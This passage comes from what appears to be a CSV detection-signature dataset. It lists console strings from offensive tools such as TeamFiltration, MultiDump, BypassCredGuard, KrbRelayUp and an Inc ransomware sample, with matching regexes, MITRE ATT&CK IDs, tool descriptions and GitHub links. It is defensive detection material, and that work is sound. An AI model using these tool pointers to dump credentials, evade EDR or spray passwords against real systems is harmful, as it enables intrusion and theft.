Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*[!] 
Nim and C# are the only language capable of executing BOFS*",".{0,1000}\[!\]\sNim\sand\sC\#\sare\sthe\sonly\slanguage\scapable\sof\sexecuting\sBOFS.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*[!] Password spraying will be conducted*",".{0,1000}\[!\]\sPassword\sspraying\swill\sbe\sconducted.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","0","N/A","10","1","60","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z" "*[!] PRESS TO EXECUTE SHELLCODED EXE*",".{0,1000}\[!\]\sPRESS\sTO\sEXECUTE\sSHELLCODED\sEXE.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*[!] Rasman service is not running!*",".{0,1000}\[!\]\sRasman\sservice\sis\snot\srunning!.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*[!] 
Shellcoded PE\'s size: *",".{0,1000}\[!\]\sShellcoded\sPE\\\'s\ssize\:\s.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*[!] SMB reflected DCOM authentication failed*",".{0,1000}\[!\]\sSMB\sreflected\sDCOM\sauthentication\sfailed.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*[!] Stealing processes delayed with *",".{0,1000}\[!\]\sStealing\sprocesses\sdelayed\swith\s.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simulation tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "*[!] Swithed to custom stealing. *",".{0,1000}\[!\]\sSwithed\sto\scustom\sstealing\.\s.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simulation tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "*[!] 
The exfiltration modules does not use FireProx*",".{0,1000}\[!\]\sThe\sexfiltration\smodules\sdoes\snot\suse\sFireProx.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*[!] The password * will be sprayed on targeted user accounts having*",".{0,1000}\[!\]\sThe\spassword\s.{0,1000}\swill\sbe\ssprayed\son\stargeted\suser\saccounts\shaving.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","0","N/A","10","1","60","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z" "*[!] Unable to read PEB address!*",".{0,1000}\[!\]\sUnable\sto\sread\sPEB\saddress!.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","0","#contentstrings","9","1","96","16","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z" "*[!] Unhandled SharpDoor exception*",".{0,1000}\[!\]\sUnhandled\sSharpDoor\sexception.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","9","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*[!] 
Valid login* expired password: *",".{0,1000}\[!\]\sValid\slogin.{0,1000}\sexpired\spassword\:\s.{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090","TA0006 - TA0005 - TA0001","N/A","N/A","Credential Access","https://github.com/nickzer0/RagingRotator","1","0","N/A","10","1","74","5","2024-02-05T21:46:54Z","2023-09-01T15:19:38Z" "*[!] You are running TeamFiltration without a config*",".{0,1000}\[!\]\sYou\sare\srunning\sTeamFiltration\swithout\sa\sconfig.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*[!] You have DCs with RC4 or DES allowed for Kerberos!!!*",".{0,1000}\[!\]\sYou\shave\sDCs\swith\sRC4\sor\sDES\sallowed\sfor\sKerberos!!!.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*[!][!][!] Checking Directories [!][!][!]*",".{0,1000}\[!\]\[!\]\[!\]\sChecking\sDirectories\s\[!\]\[!\]\[!\].{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*[!][!][!] 
Checking drivers [!][!][!]*",".{0,1000}\[!\]\[!\]\[!\]\sChecking\sdrivers\s\[!\]\[!\]\[!\].{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*[!][!][!] Checking modules loaded in your current process [!][!][!]*",".{0,1000}\[!\]\[!\]\[!\]\sChecking\smodules\sloaded\sin\syour\scurrent\sprocess\s\[!\]\[!\]\[!\].{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*[!][!][!] Checking Services [!][!][!]*",".{0,1000}\[!\]\[!\]\[!\]\sChecking\sServices\s\[!\]\[!\]\[!\].{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*[!][!][!] EDR Checks Complete [!][!][!]*",".{0,1000}\[!\]\[!\]\[!\]\sEDR\sChecks\sComplete\s\[!\]\[!\]\[!\].{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*[!][!][!] 
Welcome to SharpEDRChecker by @PwnDexter [!][!][!]*",".{0,1000}\[!\]\[!\]\[!\]\sWelcome\sto\sSharpEDRChecker\sby\s\@PwnDexter\s\[!\]\[!\]\[!\].{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*[#] [HELL HALL] Press To QUIT ... *",".{0,1000}\[\#\]\s\[HELL\sHALL\]\sPress\s\\sTo\sQUIT\s\.\.\.\s.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","8","5","413","61","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z" "*[#] Checking file against AMSI Trigger*",".{0,1000}\[\#\]\sChecking\sfile\sagainst\sAMSI\sTrigger.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*[#] Ready For ETW Patch.*",".{0,1000}\[\#\]\sReady\sFor\sETW\sPatch\..{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","81","12","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*[#] Shellcode located at address *",".{0,1000}\[\#\]\sShellcode\slocated\sat\saddress\s.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*[*] 
Appending access tokens to access_tokens.txt*",".{0,1000}\[.{0,1000}\]\sAppending\saccess\stokens\sto\saccess_tokens\.txt.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*[*] Checking access to mailboxes for each email address?*",".{0,1000}\[.{0,1000}\]\sChecking\saccess\sto\smailboxes\sfor\seach\semail\saddress\?.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*[*] Downloading the legitimate GPO from SYSVOL*",".{0,1000}\[.{0,1000}\]\sDownloading\sthe\slegitimate\sGPO\sfrom\sSYSVOL.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*[*] Injecting malicious scheduled task into downloaded GPO*",".{0,1000}\[.{0,1000}\]\sInjecting\smalicious\sscheduled\stask\sinto\sdownloaded\sGPO.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*[*] Overall compromised accounts: *",".{0,1000}\[.{0,1000}\]\sOverall\scompromised\saccounts\:\s.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform 
password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","1","83","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" "*[*] Smuggling in HTML*",".{0,1000}\[.{0,1000}\]\sSmuggling\sin\sHTML.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","9","3","214","28","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z" "*[*] Smuggling in SVG*",".{0,1000}\[.{0,1000}\]\sSmuggling\sin\sSVG.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","9","3","214","28","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z" "*[*] Starting full encryption in 5s*",".{0,1000}\[.{0,1000}\]\sStarting\sfull\sencryption\sin\s5s.{0,1000}","offensive_tool_keyword","Inc","Inc ransomware","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#yara","10","3","261","38","2024-05-01T19:21:20Z","2021-07-28T21:00:52Z" "*[*] Updating downloaded GPO version number to ensure automatic GPO application*",".{0,1000}\[.{0,1000}\]\sUpdating\sdownloaded\sGPO\sversion\snumber\sto\sensure\sautomatic\sGPO\sapplication.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*[-] * does not have Service Control Manager write privilege on 
*",".{0,1000}\[\-\]\s.{0,1000}\sdoes\snot\shave\sService\sControl\sManager\swrite\sprivilege\son\s.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1407","299","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "*[-] Account to kerberoast does not exist!*",".{0,1000}\[\-\]\sAccount\sto\skerberoast\sdoes\snot\sexist!.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*[-] COM Hijacking failed!*",".{0,1000}\[\-\]\sCOM\sHijacking\sfailed!.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","7","3","215","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z" "*[-] Couldn't change memory protection from RW to RX*",".{0,1000}\[\-\]\sCouldn\'t\schange\smemory\sprotection\sfrom\sRW\sto\sRX.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense 
Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*[-] Couldn't copy dll buffer*",".{0,1000}\[\-\]\sCouldn\'t\scopy\sdll\sbuffer.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*[-] Couldn't find KaynLoader*",".{0,1000}\[\-\]\sCouldn\'t\sfind\sKaynLoader.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*[-] Dropping DLL failed!*",".{0,1000}\[\-\]\sDropping\sDLL\sfailed!.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","7","3","215","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z" "*[-] Elevating * with DCSync privileges failed*",".{0,1000}\[\-\]\sElevating\s.{0,1000}\swith\sDCSync\sprivileges\sfailed.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*[-] Exploit failed! 
*",".{0,1000}\[\-\]\sExploit\sfailed!\s.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*[-] Failed to decrypt TGT using supplied password/hash. If this TGT was requested with no preauth then the password supplied may be incorrect or the data was encrypted with a different type of encryption than expected*",".{0,1000}\[\-\]\sFailed\sto\sdecrypt\sTGT\susing\ssupplied\spassword\/hash\.\sIf\sthis\sTGT\swas\srequested\swith\sno\spreauth\sthen\sthe\spassword\ssupplied\smay\sbe\sincorrect\sor\sthe\sdata\swas\sencrypted\swith\sa\sdifferent\stype\sof\sencryption\sthan\sexpected.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*[-] Failed to delete Performance DLL*",".{0,1000}\[\-\]\sFailed\sto\sdelete\sPerformance\sDLL.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","#contentstrings","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*[-] Failed to ReadProcessMemory for g_fParameter_UseLogonCredential*",".{0,1000}\[\-\]\sFailed\sto\sReadProcessMemory\sfor\sg_fParameter_UseLogonCredential.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - 
T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*[-] Failed to ReadProcessMemory for g_IsCredGuardEnabled*",".{0,1000}\[\-\]\sFailed\sto\sReadProcessMemory\sfor\sg_IsCredGuardEnabled.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*[-] failed to spawn shell: %s*",".{0,1000}\[\-\]\sfailed\sto\sspawn\sshell\:\s\%s.{0,1000}","offensive_tool_keyword","EQGR","Equation Group hack tool leaked by ShadowBrokers- file elgingamble Local exploit for the public prctl core dump vulnerability in recent Linux kernels","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Shell spawning","https://fdik.org/EQGRP/Linux/doc/old/etc/user.tool.elgingamble.COMMON","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*[-] Failed to WriteProcessMemory for g_fParameter_UseLogonCredential*",".{0,1000}\[\-\]\sFailed\sto\sWriteProcessMemory\sfor\sg_fParameter_UseLogonCredential.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*[-] Failed to WriteProcessMemory for g_IsCredGuardEnabled.*",".{0,1000}\[\-\]\sFailed\sto\sWriteProcessMemory\sfor\sg_IsCredGuardEnabled\..{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential 
Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!*",".{0,1000}\[\-\]\sGot\sRPC_ACCESS_DENIED!!\sEfsRpcOpenFileRaw\sis\sprobably\sPATCHED!.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","0","N/A","10","10","1713","280","2024-02-19T23:49:20Z","2021-07-18T18:19:54Z" "*[-] Hijacking failed!*",".{0,1000}\[\-\]\sHijacking\sfailed!.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","7","3","215","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z" "*[-] Inveigh Relay session *",".{0,1000}\[\-\]\sInveigh\sRelay\ssession\s.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. 
Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1407","299","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "*[-] kernel not vulnerable*",".{0,1000}\[\-\]\skernel\snot\svulnerable.{0,1000}","offensive_tool_keyword","EQGR","Equation Group hack tool leaked by ShadowBrokers- file elgingamble Local exploit for the public prctl core dump vulnerability in recent Linux kernels.","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Shell spawning","https://fdik.org/EQGRP/Linux/doc/old/etc/user.tool.elgingamble.COMMON","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*[-] NtAllocateVirtualMemory Hooked*",".{0,1000}\[\-\]\sNtAllocateVirtualMemory\sHooked.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","N/A","8","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*[-] NtProtectVirtualMemory Hooked*",".{0,1000}\[\-\]\sNtProtectVirtualMemory\sHooked.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","N/A","8","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*[-] NtWaitForSingleObject Hooked*",".{0,1000}\[\-\]\sNtWaitForSingleObject\sHooked.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","N/A","8","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*[-] Seems like we killed auditd. Ooopsie :D*",".{0,1000}\[\-\]\sSeems\slike\swe\skilled\sauditd\.\sOoopsie\s\:D.{0,1000}","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","0","N/A","8","1","17","6","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z" "*[-] Shellcode is larger than RX section*",".{0,1000}\[\-\]\sShellcode\sis\slarger\sthan\sRX\ssection.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*[-] Unable to Read LSASS Dump*",".{0,1000}\[\-\]\sUnable\sto\sRead\sLSASS\sDump.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*[+] - Bashrc persistence added!*",".{0,1000}\[\+\]\s\-\sBashrc\spersistence\sadded!.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - 
